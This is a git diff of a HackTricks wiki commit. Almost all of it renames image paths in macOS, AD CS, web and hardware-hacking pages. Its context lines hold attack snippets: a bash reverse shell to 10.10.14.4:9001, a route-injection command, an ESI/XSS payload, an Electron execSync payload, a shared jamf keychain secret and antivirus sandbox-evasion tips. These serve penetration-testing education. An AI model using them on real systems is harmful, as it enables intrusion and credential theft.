GITBOOK-3984: change request with no subject merged in GitBook
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 160 KiB |
Before Width: | Height: | Size: 129 KiB After Width: | Height: | Size: 58 KiB |
Before Width: | Height: | Size: 145 KiB After Width: | Height: | Size: 358 KiB |
Before Width: | Height: | Size: 76 KiB |
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 350 KiB |
Before Width: | Height: | Size: 8 KiB After Width: | Height: | Size: 344 KiB |
Before Width: | Height: | Size: 82 KiB After Width: | Height: | Size: 8 KiB |
Before Width: | Height: | Size: 160 KiB After Width: | Height: | Size: 3.4 KiB |
Before Width: | Height: | Size: 535 KiB After Width: | Height: | Size: 33 KiB |
Before Width: | Height: | Size: 58 KiB After Width: | Height: | Size: 535 KiB |
BIN
.gitbook/assets/image (2) (1) (1) (2) (1).png
Normal file
After Width: | Height: | Size: 76 KiB |
Before Width: | Height: | Size: 76 KiB After Width: | Height: | Size: 148 KiB |
Before Width: | Height: | Size: 148 KiB After Width: | Height: | Size: 199 KiB |
Before Width: | Height: | Size: 199 KiB After Width: | Height: | Size: 172 KiB |
Before Width: | Height: | Size: 172 KiB After Width: | Height: | Size: 61 KiB |
Before Width: | Height: | Size: 244 KiB After Width: | Height: | Size: 102 KiB |
Before Width: | Height: | Size: 358 KiB After Width: | Height: | Size: 244 KiB |
Before Width: | Height: | Size: 19 KiB After Width: | Height: | Size: 39 KiB |
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 78 KiB |
Before Width: | Height: | Size: 78 KiB After Width: | Height: | Size: 38 KiB |
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 28 KiB |
BIN
.gitbook/assets/image (4) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 60 KiB |
Before Width: | Height: | Size: 60 KiB After Width: | Height: | Size: 220 KiB |
Before Width: | Height: | Size: 220 KiB After Width: | Height: | Size: 45 KiB |
Before Width: | Height: | Size: 45 KiB After Width: | Height: | Size: 96 KiB |
Before Width: | Height: | Size: 96 KiB After Width: | Height: | Size: 129 KiB |
BIN
.gitbook/assets/image (5) (1) (1) (2) (1).png
Normal file
After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 91 KiB |
Before Width: | Height: | Size: 91 KiB After Width: | Height: | Size: 316 KiB |
Before Width: | Height: | Size: 316 KiB After Width: | Height: | Size: 29 KiB |
Before Width: | Height: | Size: 29 KiB After Width: | Height: | Size: 145 KiB |
BIN
.gitbook/assets/image (6) (2) (1).png
Normal file
After Width: | Height: | Size: 55 KiB |
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 405 KiB |
Before Width: | Height: | Size: 405 KiB After Width: | Height: | Size: 76 KiB |
BIN
.gitbook/assets/image (7) (1) (3).png
Normal file
After Width: | Height: | Size: 103 KiB |
Before Width: | Height: | Size: 103 KiB After Width: | Height: | Size: 27 KiB |
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 32 KiB |
Before Width: | Height: | Size: 61 KiB After Width: | Height: | Size: 82 KiB |
|
@ -105,11 +105,11 @@ Open the SalseoLoader project using Visual Studio.
|
||||||
|
|
||||||
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (3) (1) (1) (1).png>)
|
![](<../.gitbook/assets/image (3) (1) (1) (1) (1).png>)
|
||||||
|
|
||||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (4) (1) (1) (1).png>)
|
![](<../.gitbook/assets/image (4) (1) (1) (1) (1).png>)
|
||||||
|
|
||||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||||
|
|
||||||
|
@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
|
||||||
|
|
||||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (5) (1) (1) (2).png>)
|
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
|
||||||
|
|
||||||
### **Exit Visual Studio and execute DllExport\_configure**
|
### **Exit Visual Studio and execute DllExport\_configure**
|
||||||
|
|
||||||
|
|
|
@ -137,7 +137,7 @@ Arguments of the script:
|
||||||
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (20) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Our host seems to be in trouble :)**
|
**Our host seems to be in trouble :)**
|
||||||
|
|
||||||
|
|
|
@ -49,11 +49,11 @@ You could use the script [**JamfSniper.py**](https://github.com/WithSecureLabs/J
|
||||||
|
|
||||||
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
|
Moreover, after finding proper credentials you could be able to brute-force other usernames with the next form:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (19).png>)
|
![](<../../.gitbook/assets/image (13).png>)
|
||||||
|
|
||||||
#### JAMF device Authentication
|
#### JAMF device Authentication
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
|
The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
|
||||||
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
|
Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
|
||||||
|
@ -100,7 +100,7 @@ With this information, **create a VM** with the **stolen** Hardware **UUID** and
|
||||||
|
|
||||||
#### Secrets stealing
|
#### Secrets stealing
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p>a</p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption><p>a</p></figcaption></figure>
|
||||||
|
|
||||||
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
|
You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**.
|
||||||
|
|
||||||
|
@ -203,7 +203,7 @@ MacOS Red Teaming is different from a regular Windows Red Teaming as usually **M
|
||||||
|
|
||||||
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
|
|
@ -23,7 +23,7 @@ This function will make the **allowed binary own the PID** but the **malicious X
|
||||||
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
|
If you find the function **`shouldAcceptNewConnection`** or a function called by it **calling** **`processIdentifier`** and not calling **`auditToken`**. It highly probable means that it's v**erifying the process PID** and not the audit token.\
|
||||||
Like for example in this image (taken from the reference):
|
Like for example in this image (taken from the reference):
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
|
Check this example exploit (again, taken from the reference) to see the 2 parts of the exploit:
|
||||||
|
|
||||||
|
|
|
@ -22,7 +22,7 @@ Obviously, this is so powerful, it's complicated to load a kernel extension. The
|
||||||
|
|
||||||
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
|
* Going into **recovery mode** Kexts need to be **allowed to be loaded**:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
|
* The Kext must be **signed with a kernel code signing certificate**, which can only be granted by **Apple**. Who will be **reviewing** in detail the **company** and the **reasons** why this is needed.
|
||||||
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
|
* The Kext also needs to be **notarized**, Apple will be able to check it for malware.
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
Unlike Kernel Extensions, **System Extensions run in user space** instead of kernel space, reducing the risk of a system crash due to extension malfunction.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
There are three types of system extensions: **DriverKit** Extensions, **Network** Extensions, and **Endpoint Security** Extensions.
|
||||||
|
|
||||||
|
@ -56,7 +56,7 @@ The events that the Endpoint Security framework can monitor are categorized into
|
||||||
|
|
||||||
### Endpoint Security Framework Architecture
|
### Endpoint Security Framework Architecture
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
|
**User-space communication** with the Endpoint Security framework happens through the IOUserClient class. Two different subclasses are used, depending on the type of caller:
|
||||||
|
|
||||||
|
|
|
@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
|
||||||
|
|
||||||
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
||||||
|
|
||||||
|
@ -199,11 +199,11 @@ struct section_64 { /* for 64-bit architectures */
|
||||||
|
|
||||||
Example of **section header**:
|
Example of **section header**:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (6).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
It's also possible to get **headers information** from the **command line** with:
|
It's also possible to get **headers information** from the **command line** with:
|
||||||
|
|
||||||
|
|
|
@ -32,7 +32,7 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
Note that now **hardened** Electron applications will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
|
Note that now **hardened** Electron applications with **RunAsNode** disabled will **ignore node parameters** (such as --inspect) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set.
|
||||||
|
|
||||||
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
|
However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
|
@ -14,7 +14,7 @@
|
||||||
|
|
||||||
## Sandbox loading process
|
## Sandbox loading process
|
||||||
|
|
||||||
<figure><img src="../../../../../.gitbook/assets/image (2).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
|
<figure><img src="../../../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption><p>Image from <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
|
In the previous image it's possible to observe **how the sandbox will be loaded** when an application with the entitlement **`com.apple.security.app-sandbox`** is run.
|
||||||
|
|
||||||
|
|
|
@ -143,7 +143,7 @@ $> ls ~/Documents
|
||||||
|
|
||||||
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
|
Notes had access to TCC protected locations but when a note is created this is **created in a non-protected location**. So, you could ask notes to copy a protected file in a noe (so in a non-protected location) and then access the file:
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (18).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (11).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### CVE-2021-XXXX - Translocation
|
### CVE-2021-XXXX - Translocation
|
||||||
|
|
||||||
|
@ -387,7 +387,7 @@ The folder **`/var/db/locationd/` wasn't protected from DMG mounting** so it was
|
||||||
|
|
||||||
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
|
In several occasions files will store sensitive information like emails, phone numbers, messages... in non protected locations (which count as a vulnerability in Apple).
|
||||||
|
|
||||||
<figure><img src="../../../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Reference
|
## Reference
|
||||||
|
|
||||||
|
|
|
@ -479,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
|
||||||
|
|
||||||
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (4) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
||||||
|
|
||||||
|
|
|
@ -42,7 +42,7 @@ davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every
|
||||||
|
|
||||||
Output sample:
|
Output sample:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (19) (1) (1).png>)
|
![](<../../.gitbook/assets/image (19) (1).png>)
|
||||||
|
|
||||||
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
|
This doesn't mean that **.txt** and **.html extensions are being executed**. This mean that you can **access this files** through the web.
|
||||||
|
|
||||||
|
|
|
@ -35,12 +35,12 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
||||||
|
|
||||||
* Configure WebHook script:
|
* Configure WebHook script:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* Save changes
|
* Save changes
|
||||||
* Get the generated WebHook URL:
|
* Get the generated WebHook URL:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* Call it with curl and you shuold receive the rev shell
|
* Call it with curl and you shuold receive the rev shell
|
||||||
|
|
||||||
|
|
|
@ -206,7 +206,7 @@ The following will add a `Location` header to the response
|
||||||
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (5) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### CRLF in Add header (**CVE-2019-2438)**
|
#### CRLF in Add header (**CVE-2019-2438)**
|
||||||
|
|
||||||
|
|
|
@ -27,11 +27,11 @@ DOM Invader integrates a tab within the browser's DevTools panel enabling the fo
|
||||||
|
|
||||||
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### Inject a Canary
|
### Inject a Canary
|
||||||
|
|
||||||
|
@ -69,7 +69,7 @@ You can click each message to view more detailed information about it, including
|
||||||
|
|
||||||
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
|
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
|
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
|
||||||
|
|
||||||
|
|
|
@ -24,7 +24,7 @@ For more info about what is an iButton check:
|
||||||
|
|
||||||
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
|
The **blue** part of the following imageis how you would need to **put the real iButton** so the Flipper can **read it.** The **green** part is how you need to **touch the reader** with the Flipper zero to **correctly emulate an iButton**.
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (20) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (20).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## Actions
|
## Actions
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
|
|
||||||
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
|
iButton is a generic name for an electronic identification key packed in a **coin-shaped metal container**. It is also called **Dallas Touch** Memory or contact memory. Even though it is often wrongly referred to as a “magnetic” key, there is **nothing magnetic** in it. In fact, a full-fledged **microchip** operating on a digital protocol is hidden inside.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (19) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (19).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
|
### What is iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
|
||||||
|
|
||||||
|
|
|
@ -32,7 +32,7 @@ IR protocols differ in 3 factors:
|
||||||
|
|
||||||
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
|
Bits are encoded by modulating the duration of the space between pulses. The width of the pulse itself is constant.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (16) (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (16).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**2. Pulse Width Encoding**
|
**2. Pulse Width Encoding**
|
||||||
|
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -113,7 +113,7 @@ The **security descriptor** configured on the **Enterprise CA** defines these ri
|
||||||
|
|
||||||
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
|
This ultimately ends up setting the Security registry value in the key **`HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration<CA NAME>`** on the CA server. We have encountered several AD CS servers that grant low-privileged users remote access to this key via remote registry:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (6) (2).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (6) (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
|
Low-privileged users can also **enumerate this via DCOM** using the `ICertAdminD2` COM interface’s `GetCASecurity` method. However, normal Windows clients need to install the Remote Server Administration Tools (RSAT) to use it since the COM interface and any COM objects that implement it are not present on Windows by default.
|
||||||
|
|
||||||
|
@ -226,7 +226,7 @@ certutil -v -dstemplate #enumerate certificate templates
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -54,7 +54,7 @@ It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you c
|
||||||
|
|
||||||
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
|
Some other really good tips from [@mgeeky](https://twitter.com/mariuszbit) for going against Sandboxes
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (2) (1) (1) (2) (1).png" alt=""><figcaption><p><a href="https://discord.com/servers/red-team-vx-community-1012733841229746240">Red Team VX Discord</a> #malware-dev channel</p></figcaption></figure>
|
||||||
|
|
||||||
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
|
As we've said before in this post, **public tools** will eventually **get detected**, so, you should ask yourself something:
|
||||||
|
|
||||||
|
